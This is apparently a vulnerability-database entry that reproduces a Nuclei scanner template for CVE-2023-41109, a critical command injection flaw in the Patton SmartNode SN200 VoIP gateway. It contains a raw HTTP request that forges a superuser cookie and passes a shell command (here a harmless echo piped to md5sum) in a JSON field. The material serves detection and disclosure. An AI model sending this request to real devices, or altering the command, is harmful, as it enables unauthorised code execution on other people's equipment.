CVE-2023-41109: SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection

日期: 2025-08-01 | 影响软件: SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway | POC: 已公开

漏洞描述

The SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway is vulnerable to command injection.

PoC代码[已公开]

id: CVE-2023-41109

info:
  name: SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection
  author: princechaddha
  severity: critical
  description: |
    The SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway is vulnerable to command injection.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device.
  remediation: |
    Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
  reference: |-
    - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-019.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2023-41109
    - http://packetstormsecurity.com/files/175945/SmartNode-SN200-3.21.2-23021-OS-Command-Injection.html
    - http://seclists.org/fulldisclosure/2023/Nov/12
    - https://www.syss.de/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-41109
    cwe-id: CWE-78
    epss-score: 0.91843
    epss-percentile: 0.9968
    cpe: cpe:2.3:h:patton:smartnode_sn200:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: patton
    product: smartnode_sn200
  tags: cve,cve2023,smartnode,voip,patton
variables:
  payload: "echo CVE-2023-41109 | md5sum"

http:
  - raw:
      - |
        POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1
        Host: {{Hostname}}
        Cookie: AuthToken=; AuthGroup=superuser; UserName=admin

        {"cmd":"{{payload}}","arguments":[]}

    matchers:
      - type: word
        part: body
        words:
          - "dd556350275e2ee0a2e877cea9c8a74a"
# digest: 4a0a004730450220196f37add176794dbfe639ac25f49230748ac786d135312abc16e32fc0abe7b3022100bb271f859687f51e5d0df9f5967f58008aa039619c209866351fd97a0b04e463:922c64590222798bb761d5b6d8e72950